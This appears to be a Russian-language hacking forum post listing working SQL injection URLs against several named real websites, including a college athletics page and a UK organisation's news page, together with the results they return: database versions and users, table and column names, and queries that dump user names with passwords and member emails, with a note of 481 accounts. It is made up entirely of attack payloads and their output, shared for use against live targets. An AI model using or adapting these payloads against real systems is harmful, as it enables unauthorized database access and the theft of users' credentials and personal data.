http://www.spotbit.com/main/inside_search.php?&title=6&memberid=-2278+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103+/*+
ням,но сцк не фартит..
http://www.kishwaukeecollege.edu/athletics/player.shtml?id=-216+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19/*
Db: internet
Version: 4.1.22-log
User: interusr@webserver
openheartsopenminds.org.uk
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,version(),5,6+--+
Version: 5.0.45-community-nt
Database: sitesplus
User: sitesplus@localhost
Таблицы:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,table_name,5,6+from+informa tion_schema.tables+limit+0,1+--+
Присутствует таблица tb_users, столбцы:
user_id
site_id
user_name
user_password
expired
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,concat(user_name,0x5A,user_ password),5,6+from+tb_users+limit+0,1+--+
Всего 481 аккаунт.
MySQL 5.0.45-community-log
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x6d656d6265 72--
member::m_id,m_name,m_subscribed,m_unsubscribed,m_ email
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,concat_ws(0x0b,m_id,0x3a,m_name ,0x3a,m_subscribed,0x3a,m_unsubscribed,0x3a,m_emai l),4,5,6,7+from+member--
выводит все строки сразу.
Вывод ошибок отключен.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot